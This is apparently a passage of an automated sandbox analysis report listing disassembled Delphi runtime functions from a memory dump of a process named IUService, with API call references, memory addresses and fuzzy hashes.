                                                                                                                                            • API ID: System@$Check$qqrlususResultSystem@@UnicodeVariants@Wide$Bool$qqrx20Clr$qqrpvDataFromStr$qqrr17Str$qqrr20StringStringroStringrx8Stringx17Sysutils@Variants@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1173768992-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002D532
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002D52D
                                                                                                                                              • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                                                              • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                                                              • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                                                              • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002D555
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002D55A
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D562
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002D587
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002D58C
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$String$RaiseRecxiSysutils@$Except$qqrvException@$bctr$qqrp20Recpx14Unicode$ArrayAsg$qqrr20ClassClassoCreate$qqrp17Error$qqrucFormat$qqrx20Length$qqrvList$qqrvLoadMetaString$qqrp20Stringpx14Stringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3522162408-0
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@SafeLoadLibrary$qqrx20System@UnicodeStringui.RTL120(00000000,5002A618), ref: 5002A57F
                                                                                                                                              • Part of subcall function 5002B630: SetErrorMode.KERNEL32(00008000), ref: 5002B63A
                                                                                                                                              • Part of subcall function 5002B630: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002B684,?,00000000,5002B6A2,?,00008000), ref: 5002B663
                                                                                                                                              • Part of subcall function 5002B630: LoadLibraryW.KERNEL32(00000000,00000000,5002B684,?,00000000,5002B6A2,?,00008000), ref: 5002B669
                                                                                                                                            • GetLastError.KERNEL32(00000000,5002A618), ref: 5002A594
                                                                                                                                            • @Sysutils@SysErrorMessage$qqrui.RTL120(00000000,5002A618), ref: 5002A59C
                                                                                                                                              • Part of subcall function 50025B28: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,5002A945,00000000,5002A99F,?,00000000), ref: 50025B47
                                                                                                                                              • Part of subcall function 50025B28: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,5002A945,00000000,5002A99F,?,00000000), ref: 50025B69
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5002A618), ref: 5002A5BE
                                                                                                                                              • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                                                              • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                                                              • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                                                              • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,5002A618), ref: 5002A5C3
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@InitializePackage$qqruipqqrui$o.RTL120(00000000,5002A5EA,?,00000000,5002A618), ref: 5002A5DB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@Unicode$Sysutils@$String$ErrorLoad$RaiseRecxi$Asg$qqrr20CharChar$qqrx20ClassClassoCreate$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrp20FormatFormat$qqrx20FromInitializeLastLen$qqrr20LibraryLibrary$qqrx20List$qqrvMessageMessage$qqruiMetaModePackage$qqruipqqrui$oRecpx14SafeString$qqrp20StringpbiStringpx14StringuiStringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3738557425-0
                                                                                                                                            • Opcode ID: fe5b3e8d2f5ffc72b2367006201fb38f46a8a440544c7033cdf5550ca43c16ae
                                                                                                                                            • Instruction ID: d7048bc2172d421995a8c02b2ad295fbd71a2bff1422e86dc26ccdf7dab828b2
                                                                                                                                            • Opcode Fuzzy Hash: fe5b3e8d2f5ffc72b2367006201fb38f46a8a440544c7033cdf5550ca43c16ae
                                                                                                                                            • Instruction Fuzzy Hash: 801108309066999FE705CFA4FC529AEBBF8EB59310F504576F504E3241DB745E00C7A0
                                                                                                                                            APIs
                                                                                                                                            • @Variants@@VarToWStr$qqrr17System@WideStringrx8TVarData.RTL120(00000000,500343FC,?,?), ref: 50034374
                                                                                                                                            • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(?,?), ref: 500343AB
                                                                                                                                            • @Sysutils@TryStrToCurr$qqrx20System@UnicodeStringr15System@Currency.RTL120(?,?), ref: 500343B6
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?), ref: 500343CB
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?), ref: 500343D9
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(50034403), ref: 500343F6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Check$qqrlususResultSystem@@UnicodeVariants@Wide$Clr$qqrpvCurr$qqrx20CurrencyDataFromStr$qqrr17Str$qqrr20StringStringr15Stringrx8Stringx17Sysutils@Variants@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793089262-0
                                                                                                                                            • Opcode ID: c8516776b8bcdd41f6200822a2d131a50b3ddce558ea84b78d477e80b00441dd
                                                                                                                                            • Instruction ID: c011e0f582ae6ef03b1f2e1be8a8da17cf36d8c3296fe0757dde987aac1089ac
                                                                                                                                            • Opcode Fuzzy Hash: c8516776b8bcdd41f6200822a2d131a50b3ddce558ea84b78d477e80b00441dd
                                                                                                                                            • Instruction Fuzzy Hash: 7211B2309015999FDB42DBA4DD529DFB7E9EB85200F608232B604E7255EB306F05C691
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 500104AC
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 500104B1
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 500104C2
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 500104DF
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(?,00000000,50010520,?,?,?,00000000,00000000), ref: 500104F5
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 50010500
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@Unicode$Char$qqrr20FromStringb$Cat3$qqrr20Except$qqrvException@$bctr$qqrp20RaiseStringStringt2Stringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1860790855-0
                                                                                                                                            • Opcode ID: caeef3e0a6f3d13820a5c3a4a28f008e23b8d367d4d1577ca5722a4c6e0df794
                                                                                                                                            • Instruction ID: c00f10eb4ef58a00c0e347cc1ac883bdfb410f2ed051d6b945eaac8d7ac344f1
                                                                                                                                            • Opcode Fuzzy Hash: caeef3e0a6f3d13820a5c3a4a28f008e23b8d367d4d1577ca5722a4c6e0df794
                                                                                                                                            • Instruction Fuzzy Hash: EE1126716053C49BFB10DAA4ECD1BDFB39AEF48310F604277FA4083745D9B99E804691
                                                                                                                                            APIs
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120 ref: 5002B9FE
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002BA29
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002BA24
                                                                                                                                              • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                                                              • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                                                              • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                                                              • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002BA4C
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002BA51
                                                                                                                                            • @Sysutils@TStringBuilder@set_Length$qqri.RTL120 ref: 5002BA5D
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 5002BA77
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$String$Sysutils@$RaiseRecxiUnicode$Except$qqrvException@$bctr$qqrp20Recpx14$ArrayAsg$qqrr20Builder@set_ClassClassoCreate$qqrp17Error$qqrucFormat$qqrx20Length$qqriLength$qqrvList$qqrvLoadMetaMove$qqrpxvpviString$qqrp20Stringpx14Stringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2784925796-0
                                                                                                                                            • Opcode ID: 1667041f6e4c4e04a8d4a2e82b0d72eb47a86ad2971957d0b5d070b1c05cbe15
                                                                                                                                            • Instruction ID: cb949063882ccfe4f8492ee94f7a12960d0db32fb565db7cba8276b964dc1cb1
                                                                                                                                            • Opcode Fuzzy Hash: 1667041f6e4c4e04a8d4a2e82b0d72eb47a86ad2971957d0b5d070b1c05cbe15
                                                                                                                                            • Instruction Fuzzy Hash: 6C118630A025859BD710DFACFD81AADB7B9AF54318F5482AAE904DB352DA719D048BD0
                                                                                                                                            APIs
                                                                                                                                            • @System@@WStrToPWChar$qqrx17System@WideString.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A474
                                                                                                                                            • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A480
                                                                                                                                            • CharUpperBuffW.USER32(?,?,00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A490
                                                                                                                                            • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A49C
                                                                                                                                            • @Sysutils@AnsiUpperCase$qqrx20System@UnicodeString.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A4A7
                                                                                                                                            • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(00000000,5001A4D2,?,?,?,00000000,00000000,00000000), ref: 5001A4B2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$StringSystem@@Wide$FromUnicode$CharUpper$AnsiBuffCase$qqrx20Char$qqrx17Len$qqrr17Str$qqrr17Str$qqrr20StringpbiStringx17Stringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 534983715-0
                                                                                                                                            • Opcode ID: 5d27df0171de173af17c0cc5cb6ee76833d8b56f58fc8406f40f8d3b55e42c42
                                                                                                                                            • Instruction ID: 33202aa56892b5c3d98ea78cec372edfaed5d9f2320c7c772028933169ede13c
                                                                                                                                            • Opcode Fuzzy Hash: 5d27df0171de173af17c0cc5cb6ee76833d8b56f58fc8406f40f8d3b55e42c42
                                                                                                                                            • Instruction Fuzzy Hash: D711A530B01794ABEB10CBE8DD51B9DB3E8DB9A200F908672F900E3741D774DE458794
                                                                                                                                            APIs
                                                                                                                                            • @System@@WStrToPWChar$qqrx17System@WideString.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A518
                                                                                                                                            • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A524
                                                                                                                                            • CharLowerBuffW.USER32(?,?,00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A534
                                                                                                                                            • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A540
                                                                                                                                            • @Sysutils@AnsiLowerCase$qqrx20System@UnicodeString.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A54B
                                                                                                                                            • @System@@WStrFromUStr$qqrr17System@WideStringx20System@UnicodeString.RTL120(00000000,5001A576,?,?,?,00000000,00000000,00000000), ref: 5001A556
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$StringSystem@@Wide$FromUnicode$CharLower$AnsiBuffCase$qqrx20Char$qqrx17Len$qqrr17Str$qqrr17Str$qqrr20StringpbiStringx17Stringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 176228272-0
                                                                                                                                            • Opcode ID: 644b9fb92c3d6ef07a5067c8370350d292bcda6fbce292a46e7a1feb9069b290
                                                                                                                                            • Instruction ID: d20671b8514017f2aeb96368901a0b64a7eab2f548f792ed05b88fe4d05113d0
                                                                                                                                            • Opcode Fuzzy Hash: 644b9fb92c3d6ef07a5067c8370350d292bcda6fbce292a46e7a1feb9069b290
                                                                                                                                            • Instruction Fuzzy Hash: D0115230B05694ABEB10CBA8DD51B9DB7E9EB4A600FD146B2F900E7341DA30DE458A94
                                                                                                                                            APIs
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120 ref: 5000A8A6
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A8B2
                                                                                                                                              • Part of subcall function 5000A0CC: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A0EC
                                                                                                                                              • Part of subcall function 5000A0CC: @System@@ReallocMem$qqrrpvi.RTL120(?,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A10D
                                                                                                                                              • Part of subcall function 5000A0CC: @System@@LStrClr$qqrpv.RTL120(00000000,00000001,00000000,?,5000467F,?,?,00000000,?,500046F0,00000000,5000471D,?,?,?,00000000), ref: 5000A128
                                                                                                                                            • @System@@UniqueStringU$qqrr20System@UnicodeString.RTL120 ref: 5000A8C9
                                                                                                                                            • @System@@UniqueStringU$qqrr20System@UnicodeString.RTL120 ref: 5000A8EC
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120 ref: 5000A91E
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A92C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$StringSystem@Unicode$ArrayLength$qqrr20Length$qqrvStringiU$qqrr20Unique$AnsiClr$qqrpvFromMem$qqrrpviReallocStr$qqrr20Stringx27System@%T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 63268518-0
                                                                                                                                            • Opcode ID: d8794426dce69a8afdf5edacf3f7190b1c801e4214ab63c3ffaa2eb2339d506f
                                                                                                                                            • Instruction ID: 589278789b040e58112a918f3487c0d04965380cb2fd0c6ea7f3740b3ad11151
                                                                                                                                            • Opcode Fuzzy Hash: d8794426dce69a8afdf5edacf3f7190b1c801e4214ab63c3ffaa2eb2339d506f
                                                                                                                                            • Instruction Fuzzy Hash: 2001DD103125694EE3117FAE9851BBBB2D6DFF22117818336F145C763ADFA84946C2C0
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 5002A3F8: @Sysutils@HashName$qqrpc.RTL120 ref: 5002A412
                                                                                                                                              • Part of subcall function 5000E884: GetProcAddress.KERNEL32(?,?), ref: 5000E8A8
                                                                                                                                              • Part of subcall function 5000E884: @System@@LStrClr$qqrpv.RTL120(5000E8EE,?,?,00000000), ref: 5000E8E1
                                                                                                                                            • @Sysutils@GetModuleName$qqrui.RTL120(?,Initialize,00000000,5002A4DD), ref: 5002A48C
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,?,?,Initialize,00000000,5002A4DD), ref: 5002A4A9
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,?,?,Initialize,00000000,5002A4DD), ref: 5002A4B8
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,Initialize,00000000,5002A4DD), ref: 5002A4BD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
